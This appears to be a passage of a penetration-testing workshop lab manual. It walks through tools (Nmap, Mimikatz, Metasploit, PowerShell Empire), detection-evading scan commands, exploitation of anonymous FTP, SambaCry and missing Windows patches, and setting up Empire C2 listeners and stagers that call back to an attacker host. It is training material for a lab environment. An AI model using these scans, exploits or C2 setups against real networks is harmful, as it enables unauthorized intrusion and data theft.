Nmap is a scanning tool which can identify open ports and running services, and even identify and
exploit vulnerabilities. It is great for enumerating targets on a network, as well as checking for common
vulnerabilities. It is included in Kali Linux and available through the repositories of most Linux
distributions.
Documentation: https://nmap.org/book/man.html
PowerSploit
PowerSploit is a PowerShell toolset with features for all phases of the pentesting process from
reconnaissance to exfiltration. Some of the more popular scripts that you will use in the lab are
PowerView (in the Recon module) and PowerUp (in the Privesc module).
Download: https://github.com/PowerShellMafia/PowerSploit
Mimikatz
Mimikatz is best known for being able dump Windows credentials from memory. It also contains
functions for manipulating tokens, exporting certificates, and controlling services, among others.
Mimikatz is included in most post-exploitation frameworks such as PowerShell Empire which the
examples in this guide will use.
Download: https://github.com/gentilkiwi/mimikatz/releases
Unofficial Guide: https://adsecurity.org/?page_id=1821
Command and Control Channels
Command and control (C2) channels provide remote control over a compromised system. The
communication is typically described as âbindâ, where the compromised host listens for commands from
the server, or âreverseâ, where the compromised host calls out to the server which responds with
commands. Reverse communication is usually preferable because it is far more likely that the
compromised host can reach out past any firewalls to the attackerâs server than the other way around.
Here are just a few of the many different options for C2 software. These provide a C2 channel as well as a
post-exploitation framework with numerous functions built in and the ability to create and import new
functionality.
Metasploitâs Meterpreter
Metasploit Framework is a platform for penetration testing which includes a multitude of features from
scanning to exploitation. It also includes an agent, âMeterpreterâ, with a C2 channel to communicate
over. Meterpreterâs network communication is well understood and likely to be detected in monitored
environments, so use with caution.
Guide: https://www.offensive-security.com/metasploit-unleashed/
Documentation: https://metasploit.help.rapid7.com/docs/installing-the-metasploit-framework
Cobalt Strikeâs Beacon
7. Cobalt Strike provides a post-exploitation agent with advanced C2 channel communication. Malleable C2
profiles allow you to customize how your C2 traffic looks on the network so you can emulate existing
threat actors or legitimate website traffic. Cobalt Strike provides an easy to use graphical interface and
has a multitude of built in functionality. Itâs our favorite command and control tool but commands a
premium price.
Documentation: https://www.cobaltstrike.com/support
PowerShell Empire Agents
The examples in this lab manual are going to use PowerShell Empire wherever post-exploitation tools
and C2 channels are required. Empire is a pure PowerShell agent, though it does not require
powershell.exe for an agent to run. It features adaptable network communication, encrypted
communication, and an easy to use framework.
Documentation: https://www.powershellempire.com/?page_id=83
Download: https://github.com/EmpireProject/Empire
How to Connect
Connecting to the lab is simple! Along with the lab materials, you should have also received a
connection packet including an OpenVPN configuration file.
Linux
If youâre running a Linux based testing VM like Kali, connecting to the lab is as simple as installing
OpenVPN and resolvconf (included in most Linux repoâs) then running OpenVPN to connect with the
provided configuration file:
sudo apt-get install openvpn resolvconf
sudo openvpn <linux_client.ovpn>
Windows
If youâd like to connect a Windows system to the lab, youâll need the OpenVPN client for Windows
(https://openvpn.net/index.php/open-source/downloads.html). Once installed, put your config file in
the âconfigâ directory under your OpenVPN install location (probably C:Program FilesOpenVPNconfig).
Then open the GUI, right click on the OpenVPN task bar icon, and select âConnectâ. More detailed GUI
instructions can be found here: https://community.openvpn.net/openvpn/wiki/OpenVPN-GUI
After successfully connecting, you should see an additional network adapter with a 10.9.254.0/24 IP
address.
8. Methodology Overview
This lab manual attempts to follow an industry standard methodology for penetration testing. Here we
provide an overview of this methodology and its various components.
Vulnerability Scan vs Pentest (vs Real Attacker)
Itâs important to define what we mean by penetration test, and to differentiate that from a vulnerability
scan and from an attack simulation (or real attacker). A penetration test aims to identify vulnerabilities
and weaknesses in an environment that an attacker could use to gain unauthorized access to resources,
and to prove the impact that these weaknesses could have. To do this, a penetration tester will go
through the steps of an attack from reconnaissance to accessing sensitive resources and data. However,
they are not focused on remaining undetected, or taking the shortest possible path to a target resource;
things that a real attacker or attack simulation would likely aim to do.
A vulnerability scan simply aims to identify the technical vulnerabilities in an environment but does not
go through the act of exploiting any weaknesses or proving impact.
Attack Chain
The âattack chainâ consists of the various individual steps taken during a penetration test. These steps
are largely agreed upon throughout the industry, however there are various groupings and granularities
implemented across organizations. For the purposed of this lab, weâll assume the following four phases
of the attack chain.
Reconnaissance and Vulnerability Discovery
This phase of the attack chain uses discovery and scanning methods to better understand the
environment and identify potentially vulnerable systems and services.
Exploitation: Establishing a Foothold
During exploitation, potential vulnerabilities identified in the previous phase are technically exploited,
giving the attacker some level of access on the network.
Privilege Escalation and Lateral Movement
In this phase of the attack chain, an attacker furthers their access in the environment by compromising
additional systems and using various techniques to gain higher privileges on the network.
Data Exfiltration
Sensitive data is extracted from the environment to the attackers control, demonstrating the impact of
the penetration test.
9. Preparing for a Penetration Test
Proper preparation before any penetration test is a key factor in success. Below we outline the steps we
generally take before an engagement and suggest you do the same before diving into the lab
environment.
Virtual Machine Updates and Sanitization
The first step we take when preparing for an engagement is to ensure that all our tools and testing
machines are up to date. With Kali, this includes tools and scripts that came prepackaged with the OS as
well as any additional tools weâve added. Also, we ensure that our testing virtual machines (VMs) are
clean of any prior client data (if youâre in the consulting business).
Software Updates
In general, most of the tools in Kali will be updated automatically with system updates. However, some
may need to be manually updated. Be sure to run any update scripts or functions within these tools
before starting any penetration testing. In addition, we always update our testing image.
apt-get update && apt-get upgrade
Sanitizing Client Data
Especially if you are a consultant, you may have performed a previous penetration test or red team
engagement with your testing VM. This means there is a good chance some client specific data was
exfiltrated to your system. If you find yourself on a client network, with different client data sitting on
your VM, this is NOT good. It could even land you in some legal trouble. To avoid this uncomfortable
situation, we take the following steps:
Create a âCleanâ Snapshot â On a version of your testing VM which has never touched a client network,
preferably a fresh Kali image, perform all the necessary software and system updates. Create a snapshot
of this updated and clean virtual machine.
Revert to âCleanâ Snapshot â Anytime you are about to go on an engagement, be sure to revert to the
latest âcleanâ snapshot of your testing VM.
Update Tools â Unless you reverted to a clean image you have just created, youâll want to make sure all
your tools are up to date. Reperform the software update steps described above.
These steps should guarantee the VM used for testing has no leftover client data from previous tests.
Host Machine Configuration
In most scenarios, your host machine will not be used except in a supporting capacity. In addition, your
host probably has some configuration info that may give you away to defenders if leaked on the network
(company hostname, unusual network traffic, etc.). For this reason, we always prefer to keep our hosts
completely off the network weâre assessing. When physically plugging in to a network, you can
accomplish this by disabling the ethernet adapter on your host machine. Leaving the VM adapters
10. enabled will allow you to still bridge your testing virtual machines to the ethernet and establish a
network connection.
Setup Workshop Lab using Snaplabs Environment
Following screenshots will guide you to setup the workshop lab using Snaplabs environment.
11.
12.
13. Setup Wazuh to monitor Network activity
Please view Demo Video
Reconnaissance and Vulnerability
Discovery
At the beginning of most penetration tests, you plug into the corporate network and begin the
assessment with no privileges. This portion of the manual will walk you through this scenario and define
a methodology for establishing access and obtaining domain accounts.
Initial Enumeration
The first step after plugging in (or in this case, establishing a VPN connection) is to check your IP
configuration. Youâll want to make sure you have an internal IP address like the highlighted network
adapter configuration below. Youâll notice we have a âtun0â adapter. This happens due to the VPN
connection creating an additional interface. Plugging into an ethernet jack should configure the âeth0â
adapter (if DHCP is enabled).
Now that youâve successfully obtained an IP address, youâll want to identify some systems on the
network. An easy starting point is to perform some network sniffing, or query for DNS and Domain
Controllers.
By viewing the /etc/resolv.conf settings, we can see any DNS or Domain settings pushed to our system
through DHCP when we obtained an IP address.
14.
15. Take note of the domain and DNS server IP addresses in your favorite note taking tool (OneNote is our
go-to). Now that we know the domain, we can query for Domain Controllers as well. A simple nslookup
can accomplish this for us:
nslookup -q=SRV _ldap._tcp.<fully qualified domain name>
Note these domain controllers as well, weâll be targeting them later! At this point weâve identified a
subnet of the lab which clearly contains some important servers (10.10.93.0/24). From here we could
start to do some port scanning to identify other systems or services, but we can do some additional
enumeration before we take that step.
Scanning
Now that weâve identified a few systems in the environment we can make some good guesses about
where we are likely to find more systems. Weâll start by using Nmap to scan the subnet identified from
the domain controllers and DNS server.
When using Nmap, there are many things we can do to keep our scans relatively stealthy. Letâs walk
through some sample commands to check out a few of the options.
Web Port Scan
nmap -sS -p 80,443,8080 --open --script http-title --script-args
17. -sS This specifies a SYN scan where Nmap will send a SYN packet and listen for a SYN-ACK packet in
response. If there is a response, Nmap will send a RST packet to close the connection without
performing a full TCP handshake. If youâre running as root in Kali, this is the default scan type. This may
not be the case on other operating systems or when scanning as a non-root user.
-p 80,443,8080 This specifies the ports that we are going to scan. 80 and 443 are the default HTTP
and HTTPS ports respectively, while 8080 is a common port for other HTTP applications and admin
interfaces. Scanning a limited amount of ports at a time helps us evade some generic port scanning
detection rules.
--open This specifies that we only want open ports to be returned in the results.
--script http-title Here we specify a script to run on open ports that will output the title of
webpages. These scripts can be found in /usr/share/nmap/scripts/ if you want to check them out.
--script-args 'http.useragent="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)
like Gecko"' This specifies a user agent string to use with the script. Nmapâs default user agent string
says that it is Nmap, so that is an easy way to get caught. Here we pretend to be Internet Explorer.
10.10.40.0/24 Lastly, this is the range we are going to scan! Keeping this to one subnet at a time will
increase the chances of your scans staying under the radar.
Database Port Scan
nmap -sS -p 1433,3306 --open --script ms-sql-info,
ms-sql-empty-password, mysql-info, mysql-empty-password 10.10.40.0/24
-p 1433,3306 This specifies the ports that we are going to scan. 1433 is the default port for an MSSQL
database, and 3306 is the default port for a MySQL database. Scanning a limited amount of ports at a
time helps us evade some generic port scanning detection rules.
--script ms-sql-info, ms-sql-empty-password, mysql-info, mysql-empty-password These
scripts will retrieve information about databases on open ports, and check for empty passwords.
18. FTP, SSH and Telnet Port Scan
nmap -sS -p 21,22,23 --open --script ftp-anon, banner 10.10.40.0/24
-p 21,22,23 This specifies the ports that we are going to scan. 21 is the standard FTP port, 22 is the
standard SSH port, and 23 is the standard Telnet port. Scanning a limited amount of ports at a time
helps us evade some generic port scanning detection rules.
--script ftp-anon, banner The ftp-anon script checks for anonymous access to FTP services. The
banner script will output the banner for any open services which helps to identify potentially exploitable
services.
19. Nmap has many more options and scripts, but these should provide a solid starting point for you in the
lab.
Manual Information Gathering
Often, there are webpages in an environment that disclose useful internal information. This information
includes hostnames, IP addresses, usernames, emails, and other data that helps an attacker improve
their understanding of the internal environment. Host names and IPs are often in the form of links to
other internal websites and can help an attacker identify subnets where servers are located. Usernames
and emails are often listed as contact information, and help an attacker find users they may want to
target.
Pages that might have significant amounts of this information include things like internal home pages,
wiki pages, or other custom âintranetâ sites. Keep an eye out for these in scan results or try manually
guessing some common DNS aliases such as âwikiâ, âintranetâ, âhomeâ, or âportalâ.
20. Unauthenticated Entry Points
Easily Guessable FTP
What is it?
FTP is a common service on internal networks used for transferring and hosting files. Depending on the
use case, FTP servers can contain some sensitive data (think usernames and passwords, PII, PCI data,
etc.). This makes them attractive targets for attackers. Especially since they are sometimes configured to
allow anonymous access, or with easily guessable credentials!
How do we identify it?
FTP servers with anonymous or default access allowed can be easily identified during our initial
reconnaissance with an Nmap scan and NSE script. Scan for tcp port 21 with the âftp-anonâ NSE script to
identify open FTP servers. Another script, âftp-bruteâ, will perform brute force authentications against
the server.
How do we check if itâs vulnerable?
Youâll be able to identify if the server is indeed vulnerable from the NSE script output, which will list the
any successfully identified valid credentials.
How do we exploit the vulnerability?
To exploit a server with this misconfiguration, simply authenticate with your favorite command line
utility or GUI with the âanonymousâ user and no password, or the credentials identified by the brute
forcing script. Then, browse the available items searching for sensitive data.
ftp <username>@<target-ip>
SambaCry
What is it?
The SambaCry vulnerability affects the Linux implementation of the SMB protocol, samba, which results
in remote code execution. The specific vulnerability allows a user to upload a shared library to a known
writable share, and then causes the server to execute the library.
21. How do we identify it?
The first step in identifying a SambaCry is to identify SMB ports open on Linux servers. This can be
accomplished with Nmap by scanning for port 445 and performing operating system detection with the
-O flag.
How do we check if itâs vulnerable?
There are a couple of conditions that must exist for any identified Linux systems running a samba service
to be vulnerable. First, there must be a writable share at a known location. The server must also not
have had the workaround for this vulnerability applied â if ânt pipe support = noâ is configured than the
service will not be vulnerable. Finally, you must be able to execute uploaded files by creating a named
pipe to the file location.
You can check for all of these conditions with a helpful Nmap NSE script, smb-vuln-cve-2017-7494.
22. How do we exploit the vulnerability?
After positively identifying a vulnerable system, we can use Metasploit to exploit the system and gain an
interactive shell.
use exploit/linux/samba/is_known_pipename
23. Be sure to set the required options, then run the module!
Missing Windows Patches
What is it?
Microsoft frequently issues security patches to fix identified vulnerabilities in the Windows operating
system. Occasionally, these vulnerabilities are quite severe and result in unauthenticated code
execution. There are a few classic examples of these types of vulnerabilities that are commonly used
during penetration testing to gain remote cote execution and an initial foothold.
MS08-067: Vulnerability in Server service could allow remote code execution.
MS10-061: Vulnerability in Print Spooler Service could allow remote code execution.
MS17-010: Vulnerability in SMB protocol could allow remote code execution.
Due to large organizations having complex patch management procedures, sometimes critical patches
for these types of security issues go unapplied. This makes unpatched Windows systems especially juicy
targets for attackers.
How do we identify it?
Most of the critical vulnerabilities affecting the Windows operating system what result in remote code
execution have reliable methods of identification. In general, performing generic port scanning to
identify the OS version of potential target systems can give a clue as to whether they might be
vulnerable to a specific exploit.
For example, older Windows XP systems are commonly not patched for MS08-067. Identifying XP in an
environment often means you have found a trivial way to gain access to the Windows domain.
How do we check if itâs vulnerable?
You can often identify if a Windows system is vulnerable to a particular missing patch with scanners like
Nmap and Metasploit. Nmap has a number of SMB vulnerability checking NSE scripts which come in
handy for identifying vulnerable servers.
24. How do we exploit the vulnerability?
Once you identify a system as vulnerable, youâll want to exploit it. Metasploit is a great first stop to
check for modules which exploit vulnerabilities you may have identified. For instance, Metasploit has a
module to exploit MS17-010 on certain OS versions and architectures.
Itâs great when there are âpoint and clickâ utilities to exploit these vulnerabilities, but often times youâll
need to do a little digging to find the right exploit code or walkthroughs. For example, youâll notice that
25. only a couple exploit targets are supported by the previous Metasploit module. This is where some
Google searching and a lot of persistence pays off!
Command and Control Infrastructure
Command and Control (C2) channels are an integral part of the penetration testing process. It will be
helpful to become familiar with your chosen C2 platform before starting the lab. In our examples, weâll
rely heavily on PowerShell Empire. Assuming you have already connected to the lab, we can set up some
listeners and prepare our C2 infrastructure for use in the lab.
Firstly, youâll need to pull down Empire from its GitHub repository if you havenât already. Run the
â./setup/install.shâ file to install, and then â./empireâ to start!
Listeners
An Empire listener is an open channel on your attacking system that âlistensâ for connections from
compromised hosts. In general, they can use many different methods for transferring data. Weâll use the
HTTP listener in our labs. Configuring a listener is simple:
uselistener http
set Host <attacker-vpn-ip>:<port(80)>
execute
26. Thatâs it! You should now have a listener running on your attack machine waiting for connections. We
encourage you to experiment with other listeners and techniques on your own.
Launchers
In Empire, a launcher is a simple one-line PowerShell or python command that, when run on a
compromised host (in cmd.exe or run), should establish an agent.
launchers <powershell or python> <listener name>
Stagers
Stagers are very similar to launchers in that they contain the initial payload to establish an agent
connection on a compromised host. However, these are generally files that must be either uploaded to
the target machine or hosted on a server for download and execution. There are numerous options to
choose from for various operating systems.
usestager <stager-option>
set <option-name> <option-value>
execute
27. Agents
These are the running processes on compromised hosts which reach out to our attacking machine to
check in for commands. They are established with the stagers and launchers we just configured and
provide operating system command access on the system. Simply run your launcher on a target host
(weâll go over how later) and interact with the agent to view your options.
28. An example of running a simple shell command, âwhoamiâ.
At this point, your Command and Control infrastructure should be ready to accept agent connections on
systems that you compromise in the lab. Letâs get started